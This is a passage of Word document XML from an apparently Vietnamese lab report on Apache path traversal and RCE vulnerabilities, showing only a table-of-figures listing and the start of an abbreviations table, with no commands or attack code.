            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> của Kali</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085240 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A48DE20" w14:textId="668DB3A0" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085241" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 8: Kiểm tra kết nối mạng của Ubuntu</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085241 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="287E2B79" w14:textId="50285F53" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085242" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 9: Kiểm tra kết nối mạng của Kali</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085242 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B567D21" w14:textId="370382C4" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085243" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 10: Phiên bản Apache</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085243 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="100B08FF" w14:textId="0192C0BA" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085244" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 11: Kiểm tra Apache trên Kali</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085244 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1264E659" w14:textId="7EBC153D" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085245" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 12: Kết quả cấu hình Path traversal</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085245 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43E5914A" w14:textId="73978C86" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085246" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 13: Hình ảnh kết qủa của /etc/passwd tấn công Path traversal bằng Kali</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085246 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59039D1F" w14:textId="1786BE58" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085247" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 14: Hình ảnh kết quả của /etc/passwd trên Web Server</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085247 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AAF94E9" w14:textId="15CC6322" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085248" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 15: Kết quả của enable mod_cgi</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085248 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CF0A901" w14:textId="7922CC42" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085249" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 16: Kết quả tấn công RCE bằng Kali</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085249 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="779056AA" w14:textId="19BF172D" w:rsidR="002C2195" w:rsidRDefault="007C0A15">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc171085250" w:history="1">
        <w:r w:rsidR="002C2195" w:rsidRPr="004D2873">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4. 17: Kết quả kiểm tra lại tên User trên Web Server</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc171085250 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="002C2195">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18E6DB39" w14:textId="01285A32" w:rsidR="009D71B9" w:rsidRDefault="002C2195" w:rsidP="002C2195">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0418D93B" w14:textId="77777777" w:rsidR="009D71B9" w:rsidRDefault="009D71B9">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F4C20" w14:textId="77777777" w:rsidR="004F1393" w:rsidRPr="004F1393" w:rsidRDefault="004F1393" w:rsidP="002C2195">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F555A27" w14:textId="77777777" w:rsidR="00F872EA" w:rsidRDefault="000E5B69" w:rsidP="00F872EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc171085472"/>
      <w:r>
        <w:t>DANH MỤC VIẾT TẮT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3256"/>
        <w:gridCol w:w="6139"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F872EA" w14:paraId="51356BD3" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48706F65" w14:textId="297F1797" w:rsidR="00F872EA" w:rsidRDefault="00030F14" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00030F14">
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6E5EBE" w14:textId="44A923C7" w:rsidR="00F872EA" w:rsidRDefault="00030F14" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00030F14">
              <w:t>Common Vulnerabilities and Exposures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="6EEDBCA2" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09765E77" w14:textId="3FF3AC4D" w:rsidR="00F872EA" w:rsidRDefault="00030F14" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00030F14">
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D12A26C" w14:textId="1FC970D0" w:rsidR="00F872EA" w:rsidRDefault="00030F14" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00030F14">
              <w:t>HyperText Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="4AF8AAD3" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="316A83EB" w14:textId="5E10D688" w:rsidR="00F872EA" w:rsidRDefault="001E47D4" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="001E47D4">
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E53ABF4" w14:textId="3A5C9DB8" w:rsidR="00F872EA" w:rsidRDefault="000D202E" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="000D202E">
              <w:t>Uniform Resource Locator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="48786D3C" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40BE2BCE" w14:textId="5D207C18" w:rsidR="00F872EA" w:rsidRDefault="009A42F4" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="009A42F4">
              <w:t>SSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA35ECB" w14:textId="526E90B8" w:rsidR="00F872EA" w:rsidRDefault="009A42F4" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="009A42F4">
              <w:t>Secure Sockets Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="51C569FD" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F036851" w14:textId="04D82945" w:rsidR="00F872EA" w:rsidRDefault="009A42F4" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="009A42F4">
              <w:t>TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50C5DD3E" w14:textId="2C7FAC44" w:rsidR="00F872EA" w:rsidRDefault="009A42F4" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="009A42F4">
              <w:t>Transport Layer Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="17B5ED4B" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D800047" w14:textId="56BDB6A4" w:rsidR="00F872EA" w:rsidRDefault="009A42F4" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="009A42F4">
              <w:t>DDoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
